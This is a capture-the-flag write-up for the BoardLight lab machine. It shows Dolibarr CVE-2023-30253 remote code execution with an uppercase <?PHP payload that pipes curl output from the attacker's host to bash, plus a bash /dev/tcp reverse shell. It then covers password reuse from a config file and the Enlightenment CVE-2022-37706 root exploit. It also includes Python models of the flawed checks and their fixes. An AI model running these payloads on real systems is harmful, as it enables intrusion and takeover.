This box involves exploiting Dolibarr 17.0.0 for remote code execution (RCE) as an authenticated user, giving access as the www-data user. Understanding the exploit and examining the configuration files reveals credentials that allow escalating to a regular user account. The system is also vulnerable to CVE-2022-37706, which allows a further privilege escalation to root.
Nmap scan
First, we check for open ports:
nmap -sV -sC 10.10.11.11 -v
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have web and SSH services running.
Web enumeration
Checking the page source, I found a domain:
$ curl -s http://10.10.11.11 | grep htb
[email protected]
<a href="https://html.design/">Board.htb</a>
We can add it to the hosts file:
echo "10.10.11.11 board.htb" | sudo tee -a /etc/hosts
There is also an interesting comment in the page:
curl http://board.htb | grep '<!'
<!-- Basic -->
<!-- Mobile Metas -->
<!-- Site Metas -->
<!-- slider stylesheet -->
<!-- slider stylesheet -->
<!-- bootstrap core css -->
<!-- fonts style -->
<!-- Custom styles for this template -->
<!-- responsive style -->
<!-- header section strats -->
<!-- <a class="nav-link" href="portfolio.php"> Portfolio </a> -->
http://board.htb/portfolio.php exists, but we don't know its parameters. I tried to brute-force them without any luck.
Subdomain enumeration
This step was really tricky. I am not really sure why gobuster failed, so I tried multiple times with ffuf and finally got a hit:
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.board.htb" -fw 6243 -u http://board.htb
:: Method : GET
:: URL : http://board.htb
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.board.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 6243
________________________________________________
crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 107ms]
We can add this subdomain to the hosts file as well:
echo "10.10.11.11 crm.board.htb" | sudo tee -a /etc/hosts
CVE-2023-30253
Checking the page http://crm.board.htb/
It's Dolibarr 17.0.0. Searching for CVEs related to this version quickly revealed CVE-2023-30253.
CVE-2023-30253 is a critical vulnerability in Dolibarr versions before 17.0.1 that allows remote code execution (RCE) by an authenticated user via an uppercase manipulation: <?PHP instead of <?php. The website module lets a user put dynamic content into a page, and the check meant to keep PHP out of that content only recognised the lowercase opener, so the uppercase tag is saved and then executed on the server. Exploiting it requires an authenticated user who can create pages; exploit scripts automate the login, the page creation and the payload upload. Understanding this mechanism is what makes the exploit reliable when it comes to executing commands on the target.
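To make the uppercase trick concrete, here is an added Python model (not Dolibarr's code and not from the original post) of a page-content gate: the case-sensitive check that an uppercase opener slips past, beside a case-insensitive one. The function names and the sample page bodies are constructed for this illustration.

```python
import re

# Constructed sample page bodies (not from the original post); "uppercase"
# mirrors the <?PHP variant described for CVE-2023-30253.
SAMPLE_BODIES = {
    "plain": "<p>Hello from the test page</p>",
    "lowercase": "<p>x</p><?php echo system('id'); ?>",
    "uppercase": "<p>x</p><?PHP echo system('id'); ?>",
    "mixed": "<p>x</p><?Php echo 1; ?>",
    "short_echo": "<p>x</p><?= shell_exec('id') ?>",
}


def contains_php_vulnerable(body: str) -> bool:
    """Simplified model of a case-sensitive gate: only the exact lowercase
    '<?php' opener counts as PHP, so '<?PHP' and '<?=' slip through."""
    return "<?php" in body


def contains_php_hardened(body: str) -> bool:
    """Case-insensitive gate that also covers the '<?=' short-echo opener.
    PHP itself treats the opener case-insensitively, so the gate must too."""
    return re.search(r"<\?(php\b|=)", body, re.IGNORECASE) is not None


def may_save_page(body: str, user_has_php_right: bool, check=contains_php_hardened) -> bool:
    """Policy a CMS should enforce: PHP in page content is accepted only from a
    user who is explicitly granted the right to write dynamic content."""
    return user_has_php_right or not check(body)


def blocked_by(check) -> list:
    """Names of the sample bodies a given check refuses for an ordinary user."""
    return sorted(name for name, body in SAMPLE_BODIES.items()
                  if not may_save_page(body, False, check))
```

With the vulnerable check only the lowercase sample is refused; the hardened one refuses all four PHP variants while still letting a user who holds the dynamic-content right save them.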
First shell
I searched for the default credentials for Dolibarr, and admin:admin worked.
Following the article where I found the CVE details, I was able to get command execution!
So we can create a bash reverse shell script, shell.sh:
#!/bin/bash
bash -i >& /dev/tcp/10.10.16.x/4444 0>&1
Run a listener on port 4444
nc -vlp 4444
From another terminal, host the shell
python3 -m http.server
Go to http://crm.board.htb/website/index.php and create a website called test.
Then create a page called test.
Finally, click on Edit HTML source and insert the payload (adding the payload directly to the page can work as well):
<?PHP echo system("curl http://10.10.16.x:8000/shell.sh | bash");?>
and we got a shell back!
$ nc -vlp 4444
listening on [any] 4444 ...
connect to [10.10.16.x] from board.htb [10.10.11.11] 45992
bash: cannot set terminal process group (885): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:~/html/crm.board.htb/htdocs/website$
Second way
Searching for the exploit using poc-seeker
-----------------------------
-> CVE id : CVE-2023-30253
-> CVE description : Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data.
-> Base score : 8.8
-> Attack complexity : LOW
-> User interaction : NONE
-> Required privileges : LOW
------------------------------
Searching github DONE
Searching sploitus DONE
Searching exploit db DONE
Searching vulnerability lab DONE
I think I've found potential POC for you
[+] https://github.com/04Shivam/CVE-2023-30253-Exploit
[+] https://github.com/Rubikcuv5/cve-2023-30253
[+] https://github.com/g4nkd/CVE-2023-30253-PoC
[+] https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253
You may have a look at the following
[!] -
[!] https://github.com/04Shivam/CVE-2023-30253
[!] https://github.com/andria-dev/DolibabyPhp
[!] https://github.com/dollarboysushil/Dolibarr-17.0.0-Exploit-CVE-2023-30253
Trying the first POC works!
$ python3 CVE-2023-30253.py
Enter the domain name (eg: app.hackthebox.com)
>>>crm.board.htb
Enter the ip address for reverse shell
>>>10.10.14.x
Enter port number for reverse shell
>>>4444
[+] Username password used admin:admin
[+] Extracted CSRF Token
[+] Logged In successfully
[+] Website created successfully
[+] Page created successfully
[+] Payload uploaded
[+] Payload Execution Url: http://crm.board.htb/public/website/index.php?website=0e1fef09ad10419da88c72f0d7e986d9&pageid=4
[+] Check your listner
[+] Payload Executed
Own user
Listing the files and directories:
www-data@boardlight:~/html/crm.board.htb/htdocs$ ls -lht
ls -lht
total 576K
drwxr-xr-x 2 www-data www-data 4.0K May 17 00:18 conf
drwxr-xr-x 11 www-data www-data 4.0K Mar 4 2023 accountancy
drwxr-xr-x 9 www-data www-data 4.0K Mar 4 2023 adherents
drwxr-xr-x 6 www-data www-data 4.0K Mar 4 2023 admin
The modification date of the conf directory is interesting. Checking the config files:
www-data@boardlight:~/html/crm.board.htb/htdocs$ cat conf/conf.php
cat conf/conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
Found a password: serverfun2$2023!!
To find the user, we can just check /home (HackTheBox style), or check which users in /etc/passwd have a login shell.
ls /home
larissa
Trying to ssh with the user larissa with the found password worked!
$ ssh larissa@board.htb
The authenticity of host 'board.htb (10.10.11.11)' can't be established.
ED25519 key fingerprint is SHA256:xngtcDPqg6MrK72I6lSp/cKgP2kwzG6rx2rlahvu/v0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'board.htb' (ED25519) to the list of known hosts.
larissa@board.htb's password:
...
larissa@boardlight:~$ wc -c user.txt
33 user.txt
Own root
Running linpeas revealed a few unknown setuid binaries:
╔══════════╣ SUID - Check easy privesc, exploits and write perms
║ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 15K Apr 8 18:36 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 27K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)
This can also be done using:
find / -perm -4000 2>/dev/null
Checking the enlightenment version:
enlightenment --version
ESTART: 0.00002 [0.00002] - Begin Startup
ESTART: 0.00090 [0.00088] - Signal Trap
ESTART: 0.00115 [0.00025] - Signal Trap Done
ESTART: 0.00243 [0.00127] - Eina Init
ESTART: 0.00359 [0.00116] - Eina Init Done
ESTART: 0.00360 [0.00001] - Determine Prefix
ESTART: 0.00442 [0.00082] - Determine Prefix Done
ESTART: 0.00443 [0.00002] - Environment Variables
ESTART: 0.00444 [0.00001] - Environment Variables Done
ESTART: 0.00445 [0.00000] - Parse Arguments
Version: 0.23.1
E: Begin Shutdown Procedure!
The version is 0.23.1.
Searching for a CVE related to this version returns CVE-2022-37706
CVE-2022-37706 is a local privilege escalation in the Enlightenment window manager: its setuid helper enlightenment_sys does not handle pathnames safely, allowing a local user to gain root.
Create a directory whose name abuses that pathname handling. The path "/dev/../tmp/;" is treated by the vulnerable function in a special way, and it is followed by /tmp/exploit:
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
Create the exploit script:
echo "/bin/bash" > /tmp/exploit
chmod a+x /tmp/exploit
Executing the exploit:
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
- /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/mount: runs the mount command through the setuid helper, which is the vulnerable component.
- -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u),: the mount options. The important part is uid=$(id -u), which sets the uid option to the current user's ID.
- "/dev/../tmp/;/tmp/exploit" /tmp///net: the key part of the exploit. This path abuses the pathname handling so that /tmp/exploit (which contains /bin/bash) is executed, giving the attacker a root shell.
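As an added illustration of why the "/dev/../tmp/;" pathname works against a setuid mount helper, here is a simplified Python model written for this write-up (not Enlightenment's actual code): a prefix-only device check beside a hardened one that canonicalises the path, keeps it under /dev, and hands mount an argv list rather than a shell command string. The function names and the sample devices are assumptions.

```python
import os

ALLOWED_DEVICE_PREFIX = "/dev/"

# Constructed inputs: a benign device and the pathname used in the write-up.
BENIGN_DEVICE = "/dev/sdb1"
MALICIOUS_DEVICE = "/dev/../tmp/;/tmp/exploit"


def device_ok_prefix_only(device: str) -> bool:
    """Model of an insufficient check: a bare prefix test that
    '/dev/../tmp/;/tmp/exploit' passes although it leaves /dev and carries ';'."""
    return device.startswith(ALLOWED_DEVICE_PREFIX)


def device_ok_hardened(device: str) -> bool:
    """Collapse '..' and '//' first, require the canonical path to stay under
    /dev, refuse anything canonicalisation changed, and allow only a safe
    character set (a real helper would also realpath() and check S_ISBLK)."""
    canonical = os.path.normpath(device)
    if canonical != device or not canonical.startswith(ALLOWED_DEVICE_PREFIX):
        return False
    return all(ch.isalnum() or ch in "/_-." for ch in canonical)


def build_mount_argv(device: str, mountpoint: str, uid: int, check=device_ok_hardened) -> list:
    """Validate, then return an argv list for an execve-style call. Because the
    arguments never pass through a shell, ';' cannot start a second command."""
    if not check(device):
        raise ValueError(f"rejected device path: {device!r}")
    return ["/bin/mount", "-o", f"noexec,nosuid,nodev,uid={uid}", device, mountpoint]
```

On a server that has no need for a desktop helper, removing the setuid bit from enlightenment_sys (or upgrading Enlightenment past the affected release) is the practical mitigation.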
larissa@boardlight:~$ /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
mount: /dev/../tmp/: can't find in /etc/fstab.
root@boardlight:/home/larissa#
root@boardlight:/home/larissa# wc -c /root/root.txt
33 /root/root.txt
root@boardlight:/home/larissa#
Finally the box is owned!